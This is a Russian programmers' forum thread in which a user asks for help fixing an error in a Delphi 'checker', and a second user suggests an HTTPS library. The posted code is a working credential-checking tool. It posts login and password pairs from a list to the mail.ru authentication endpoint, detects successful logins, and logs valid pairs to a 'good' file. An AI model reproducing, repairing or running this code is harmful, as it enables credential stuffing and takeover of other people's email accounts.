Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 09.01.2013, 17:03   #1
stasa9711
Форумчанин
 
Регистрация: 01.10.2012
Сообщений: 106
Вопрос ошибка в delphi

всем привет , как исправить вот такую ошибку работаю с чекером .... вот код :
Код:
procedure TNewThread.Execute;
var CurAcc:integer;
    data:Tstringlist;
    HTTP: THTTPSend;
    Res : boolean;
  d,f: TStringStream;
     s:string;
     i:integer;


    HTTP2: TIdHTTP;
    
  ProxyCount: Integer;
  IP, Port: string;
begin
 while Work do
  begin
   CS.Enter;
   Inc(Acc);
   if Acc<Accounts.Count then CurAcc:=Acc else Work:=false;
   CS.Leave;

   if Work then
    begin
         FAcc:= form1.sedit2.text;
  FPas:= Accounts.Strings[CurAcc];
  
    HTTP := THTTPSend.Create;
 HTTP.MimeType:='application/x-www-form-urlencoded';
   f:= TStringStream.Create('');


    d:=TStringStream.Create('Domain=mail.ru&Login='+ FAcc+'&Password='+ FPas+'&level=0');

    HTTP.Document.LoadFromStream(d);

    Res := HTTP.HTTPMethod('POST', 'https://auth.mail.ru/cgi-bin/auth');
    http.Clear;
    http.HTTPMethod('get','https://e.mail.ru/cgi-bin/editpass');
    HTTP.Document.SaveToStream(f);




  if pos('logout',f.DataString)<>0 then begin
        work := false;
              rez := 1;
          end else
         rez := -1;
  end;
       f.Free;
     d.Free;
    HTTP.Free;

       Synchronize(Sync);

    end;
  end;




procedure TNewThread.Sync;
begin
 case Rez of
   0:begin
      Accounts.Add(FAcc+';'+FPas);
     end;
   1:begin
      Append(GoodFile);
      Writeln(GoodFile,FAcc+';'+FPas);
      Closefile(GoodFile);
      Form1.GoodLabel.Caption:=IntToStr(StrToInt(Form1.GoodLabel.Caption)+1);
      Form1.Gauge1.Progress:=Form1.Gauge1.Progress+1;
     end;
  -1:begin
      Append(BadFile);
      Writeln(BadFile,FAcc+';'+FPas);
      Closefile(BadFile);
      Form1.BadLabel.Caption:=IntToStr(StrToInt(Form1.BadLabel.Caption)+1);
      Form1.Gauge1.Progress:=Form1.Gauge1.Progress+1;
     end;
 end;
end;
stasa9711 вне форума Ответить с цитированием
Старый 10.01.2013, 20:30   #2
hottabxp
Новичок
Джуниор
 
Регистрация: 09.11.2010
Сообщений: 1
По умолчанию

Возможно нужно подключить библиотеку для работы с https? Выложите весь проект, я посмотрю.
hottabxp вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ошибка в DELPHI V.OX Общие вопросы Delphi 7 21.12.2009 04:03
Это ошибка Delphi или моя ошибка??? bloodeagle Общие вопросы Delphi 3 12.11.2009 15:26
Ошибка Delphi Ruska882009 Помощь студентам 1 05.10.2009 12:39
[Delphi] ошибка... Рамик Помощь студентам 2 06.08.2009 14:10
ошибка в Delphi 6 Ms-dos4 Софт 7 26.08.2007 14:09